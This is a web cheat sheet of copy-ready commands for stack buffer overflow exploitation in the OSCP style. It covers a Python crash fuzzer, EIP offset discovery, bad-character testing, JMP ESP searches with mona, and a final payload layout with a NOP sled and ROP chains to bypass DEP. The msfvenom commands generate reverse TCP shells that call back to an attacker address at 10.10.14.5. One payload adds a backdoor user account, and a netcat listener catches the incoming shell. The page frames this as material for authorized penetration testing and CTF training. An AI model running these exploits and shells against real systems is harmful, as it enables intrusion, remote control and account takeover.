Buffer Overflow Cheat Sheet

Copy-ready commands for OSCP-style stack buffer overflow exploitation: fuzzing, EIP offset, bad chars, JMP ESP, shellcode, and DEP/ROP. (28 payloads)

Try it interactively with the Shellcode Encoder & Formatter

1. Fuzzing & Triggering the Crash

(4)

python3 -c 'print("A" * 100)'

Generate a simple buffer of repeating bytes to send to the target field/input and observe behavior before fuzzing in earnest.Baseline buffer generation

buffer = "A" * 100
while True:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, port))
        s.send(bytes(buffer + "\r\n", "latin-1"))
        s.close()
        print("Sent: %d bytes" % len(buffer))
        buffer += "A" * 100
    except:
        print("Crashed at %d bytes" % len(buffer))
        sys.exit(0)

Python fuzzer that grows the buffer by 100 bytes each iteration until the service crashes, printing the approximate crash length.Network service fuzzing loop

spike: tcp generic fuzzer
generic_send_tcp <ip> <port> <spike_script> 0 0

Use SPIKE to fuzz a TCP service with a defined block script when you need protocol-aware fuzzing rather than a flat byte buffer.Alternative: protocol-aware fuzzing

!mona config -set workingfolder c:\mona\%p

In Immunity Debugger with mona.py, set a per-process working folder so all generated artifacts (pattern, bad chars, ROP) land in one place.Immunity Debugger + mona setup

2. Controlling EIP (Offset Discovery)

(5)

msf-pattern_create -l 400

Create a 400-byte De Bruijn cyclic pattern of unique 3-byte sequences to send in place of the crash buffer so each offset is identifiable.Kali: Metasploit pattern_create

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 400

Full-path equivalent of pattern_create when the msf-pattern_create wrapper is not on PATH.Direct Ruby tool path

msf-pattern_offset -l 400 -q 39694438

Take the value sitting in EIP after the crash (-q) and return the exact byte offset, i.e. the length of padding before EIP is overwritten.Kali: Metasploit pattern_offset

!mona findmsp -distance 400

Mona alternative that locates the cyclic pattern in memory and reports the EIP offset plus which registers point into your buffer.Immunity Debugger + mona

offset = 524
payload = "A" * offset + "B" * 4 + "C" * 200

Verify control: pad to the offset, place 4 'B' bytes (should land 42424242 in EIP), then filler. Confirm EIP == 0x42424242 before continuing.EIP control verification

3. Finding Bad Characters

(4)

badchars = (
  b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
  b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
  ... through \xff )

Send all bytes 0x01-0xFF (excluding the already-known \x00) after the EIP overwrite, then inspect memory to see which bytes are mangled or truncated.\x00 (null) is almost always bad

for ($i = 0x01; $i -le 0xff; $i++) {[char][byte]$i}

Quick way to enumerate the full byte range when hand-building the bad-char test string in a script.Byte range generation

!mona bytearray -b "\x00"

Generate a bytearray of all chars excluding known bad ones; outputs both a .bin file and a copy-ready string for your exploit.Immunity Debugger + mona

!mona compare -f c:\mona\bytearray.bin -a <ESP_address>

Compare the in-memory buffer at ESP against the generated bytearray to automatically flag every bad character that was corrupted.Automated bad char comparison

4. Finding a Return Address (JMP ESP)

(5)

!mona jmp -r esp -cpb "\x00\x0a\x0d"

Search loaded modules for a JMP ESP / CALL ESP instruction whose address contains none of the listed bad characters (-cpb).Immunity Debugger + mona (preferred)

!mona modules

List loaded modules with their protections (ASLR, DEP, SafeSEH, Rebase). Pick a module with protections disabled to source a stable return address.Module protection audit

msf-nasm_shell
nasm > jmp esp

Convert the JMP ESP mnemonic to its opcode (FFE4) so you can search a module's memory for that exact byte sequence.Get the opcode to search for

ret = struct.pack("<I", 0x625011af)

Pack the chosen JMP ESP address as little-endian into the EIP slot. Address 0x625011af becomes bytes \xaf\x11\x50\x62 on the wire.Little-endian packing for EIP

gdb-peda$ jmpcall esp

On Linux targets, use PEDA to locate jmp/call esp gadgets directly inside the debugged binary and its libraries.Linux: GDB + PEDA

5. Generating Shellcode (msfvenom)

(5)

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d" -f python -v shellcode

Generate a staged-free Windows reverse TCP shell, avoiding bad chars (-b), output as a Python variable named shellcode. EXITFUNC=thread keeps the service alive.Most common OSCP payload

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -b "\x00" -f c -e x86/shikata_ga_nai

Same reverse shell encoded with shikata_ga_nai (polymorphic XOR) to scrub bad characters from the payload, emitted as a C array.Encoder to remove bad chars

msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f python -b "\x00\x0a\x0d"

Linux x86 reverse TCP shellcode for stack overflows on 32-bit Linux binaries.Linux x86 target

msfvenom -p windows/exec CMD="net user pwn Password123! /add" -b "\x00" -f python

Run a single command instead of a reverse shell, useful when egress is filtered. Common follow-up: add the user to the Administrators group.No-network / command execution

nc -nvlp 443

Start the Netcat listener on the attacker box to catch the reverse shell before sending the final exploit.Catch the reverse shell

6. Final Exploit, NOP Sled & DEP/ROP

(5)

payload = "A"*offset + ret + "\x90"*16 + shellcode

Final buffer layout: padding to EIP, the JMP ESP return address, a small NOP sled for landing/decoder space, then the shellcode.Standard exploit structure

nops = "\x90" * 16

NOP sled (0x90 = no-op) placed before shellcode to absorb minor stack drift and give encoders like shikata_ga_nai room to decode.Landing pad before shellcode

!mona ropchain -m "module1,module2" -cpb "\x00\x0a\x0d"

When DEP is enabled the stack is non-executable, so auto-generate a ROP chain (typically calling VirtualProtect/VirtualAlloc) to mark memory executable before jumping to shellcode.DEP bypass via ROP

!mona rop -m *.dll -cpb "\x00\x0a\x0d"

Dump usable ROP gadgets from loaded DLLs into rop.txt/rop_suggestions.txt to hand-build a chain when the automated ropchain is incomplete.Manual ROP gadget hunting

ROPgadget --binary ./vuln --only "pop|ret"

On Linux, enumerate pop/ret gadgets to construct a ret2libc or ROP chain that bypasses NX/DEP without injecting executable shellcode.Linux: ROPgadget for NX bypass

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Cheat Sheets

Reverse Shell Cheat Sheet Post-Exploitation Cheat Sheet

Frequently asked questions

What is the Buffer Overflow Cheat Sheet?+

It's a quick-reference collection of 28 Buffer Overflow payloads for testing Buffer Overflow vulnerabilities during authorized penetration testing, bug bounties, and CTFs. Every payload is copy-ready and grouped by attack context.

How do I use these Buffer Overflow payloads?+

Copy any payload straight into your authorized test, or use the Shellcode Encoder & Formatter to apply them interactively. Only test systems you have explicit permission to assess.

Are these Buffer Overflow payloads free to use?+

Yes — this cheat sheet and all Buffer Overflow payloads are completely free, with no account required. Everything runs in your browser.

$loading...

Frequently asked questions

What is the Buffer Overflow Cheat Sheet?+

How do I use these Buffer Overflow payloads?+

Copy any payload straight into your authorized test, or use the Shellcode Encoder & Formatter to apply them interactively. Only test systems you have explicit permission to assess.

Are these Buffer Overflow payloads free to use?+

Yes — this cheat sheet and all Buffer Overflow payloads are completely free, with no account required. Everything runs in your browser.

Buffer Overflow Cheat Sheet

1. Fuzzing & Triggering the Crash

2. Controlling EIP (Offset Discovery)

3. Finding Bad Characters

4. Finding a Return Address (JMP ESP)

5. Generating Shellcode (msfvenom)

6. Final Exploit, NOP Sled & DEP/ROP

Related Tools

Related Cheat Sheets

Frequently asked questions

Buffer Overflow Cheat Sheet

1. Fuzzing & Triggering the Crash

2. Controlling EIP (Offset Discovery)

3. Finding Bad Characters

4. Finding a Return Address (JMP ESP)

5. Generating Shellcode (msfvenom)

6. Final Exploit, NOP Sled & DEP/ROP

Related Tools

Related Cheat Sheets

Frequently asked questions